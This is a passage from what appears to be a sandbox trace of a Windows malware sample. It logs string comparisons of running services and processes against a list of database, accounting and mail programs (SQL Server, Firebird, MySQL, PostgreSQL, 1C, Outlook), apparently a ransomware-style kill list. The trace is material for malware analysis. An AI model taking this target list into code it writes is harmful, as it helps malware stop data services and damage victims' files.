(lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0268.954] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0268.955] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0268.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0268.955] lstrlenW (lpString="BFE") returned 3 [0268.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0268.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0268.955] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0268.955] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0268.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0268.955] lstrlenW (lpString="CryptSvc") returned 8 [0268.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0268.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0268.955] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0268.955] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0268.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0268.955] lstrlenW (lpString="CscService") returned 10 [0268.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0268.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0268.955] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0268.955] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0268.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0268.955] lstrlenW (lpString="DcomLaunch") returned 10 [0268.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.955] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0268.955] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0268.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0268.955] lstrlenW (lpString="Dhcp") returned 4 [0268.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0268.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0268.955] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0268.955] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0268.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0268.955] lstrlenW (lpString="Dnscache") returned 8 [0268.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0268.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0268.956] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0268.956] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0268.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0268.956] lstrlenW (lpString="DPS") returned 3 [0268.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0268.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0268.956] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0268.956] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0268.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0268.956] lstrlenW (lpString="eventlog") returned 8 [0268.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0268.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0268.956] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0268.956] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0268.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0268.956] lstrlenW (lpString="EventSystem") returned 11 [0268.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0268.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0268.956] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0268.956] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0268.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0268.956] lstrlenW (lpString="gpsvc") returned 5 [0268.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0268.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0268.956] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0268.956] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0268.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0268.956] lstrlenW (lpString="LanmanWorkstation") returned 17 [0268.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0268.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0268.956] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0268.956] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0268.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0268.957] lstrlenW (lpString="lmhosts") returned 7 [0268.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0268.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0268.957] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0268.957] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0268.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0268.957] lstrlenW (lpString="MMCSS") returned 5 [0268.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0268.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0268.957] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0268.957] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0268.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0268.957] lstrlenW (lpString="MpsSvc") returned 6 [0268.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0268.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0268.957] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0268.957] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0268.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0268.957] lstrlenW (lpString="NlaSvc") returned 6 [0268.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0268.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0268.957] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0268.957] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0268.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0268.957] lstrlenW (lpString="nsi") returned 3 [0268.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0268.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0268.957] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0268.957] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0268.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0268.957] lstrlenW (lpString="PcaSvc") returned 6 [0268.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0268.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0268.958] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0268.958] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0268.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0268.958] lstrlenW (lpString="PlugPlay") returned 8 [0268.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0268.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0268.958] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0268.958] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0268.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0268.958] lstrlenW (lpString="Power") returned 5 [0268.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0268.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0268.958] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0268.958] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0268.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0268.958] lstrlenW (lpString="ProfSvc") returned 7 [0268.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0268.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0268.958] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0268.958] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0268.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0268.958] lstrlenW (lpString="RpcEptMapper") returned 12 [0268.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.958] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0268.958] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0268.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0268.958] lstrlenW (lpString="RpcSs") returned 5 [0268.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0268.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0268.958] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0268.958] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0268.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0268.959] lstrlenW (lpString="SamSs") returned 5 [0268.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0268.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0268.959] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0268.959] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0268.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0268.959] lstrlenW (lpString="Schedule") returned 8 [0268.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0268.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0268.959] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0268.959] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0268.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0268.959] lstrlenW (lpString="SENS") returned 4 [0268.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0268.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0268.959] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0268.959] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0268.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0268.959] lstrlenW (lpString="ShellHWDetection") returned 16 [0268.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.959] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0268.959] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0268.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0268.959] lstrlenW (lpString="Spooler") returned 7 [0268.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0268.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0268.960] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0268.960] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0268.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0268.960] lstrlenW (lpString="SysMain") returned 7 [0268.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0268.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0268.960] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0268.960] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0268.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0268.960] lstrlenW (lpString="Themes") returned 6 [0268.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0268.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0268.960] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0268.960] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0268.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0268.960] lstrlenW (lpString="TrkWks") returned 6 [0268.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0268.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0268.960] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0268.960] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0268.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0268.960] lstrlenW (lpString="UxSms") returned 5 [0268.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0268.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0268.961] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0268.961] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0268.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0268.961] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0268.961] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c0 [0268.962] Process32FirstW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.962] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.962] lstrlenW (lpString="System") returned 6 [0268.962] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0268.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0268.962] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0268.962] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0268.962] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0268.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0268.962] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0268.962] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.963] lstrlenW (lpString="smss.exe") returned 8 [0268.963] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0268.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0268.963] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0268.963] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0268.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0268.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0268.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0268.963] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.963] lstrlenW (lpString="csrss.exe") returned 9 [0268.963] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.963] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.963] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.963] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.964] lstrlenW (lpString="wininit.exe") returned 11 [0268.964] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0268.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0268.964] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0268.964] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0268.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0268.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0268.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0268.964] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.964] lstrlenW (lpString="csrss.exe") returned 9 [0268.964] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.964] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.964] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.964] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.965] lstrlenW (lpString="winlogon.exe") returned 12 [0268.965] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0268.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0268.965] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0268.965] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0268.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0268.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0268.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0268.965] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.965] lstrlenW (lpString="services.exe") returned 12 [0268.965] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0268.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0268.965] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0268.965] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0268.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0268.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0268.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0268.965] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.965] lstrlenW (lpString="lsass.exe") returned 9 [0268.965] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0268.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0268.966] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0268.966] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0268.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0268.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0268.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0268.966] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0268.966] lstrlenW (lpString="lsm.exe") returned 7 [0268.966] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0268.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0268.966] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0268.966] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0268.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0268.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0268.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0268.966] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.966] lstrlenW (lpString="svchost.exe") returned 11 [0268.966] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.966] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.966] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.967] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.967] lstrlenW (lpString="svchost.exe") returned 11 [0268.967] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.967] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.967] lstrlenW (lpString="svchost.exe") returned 11 [0268.967] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.968] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.968] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, 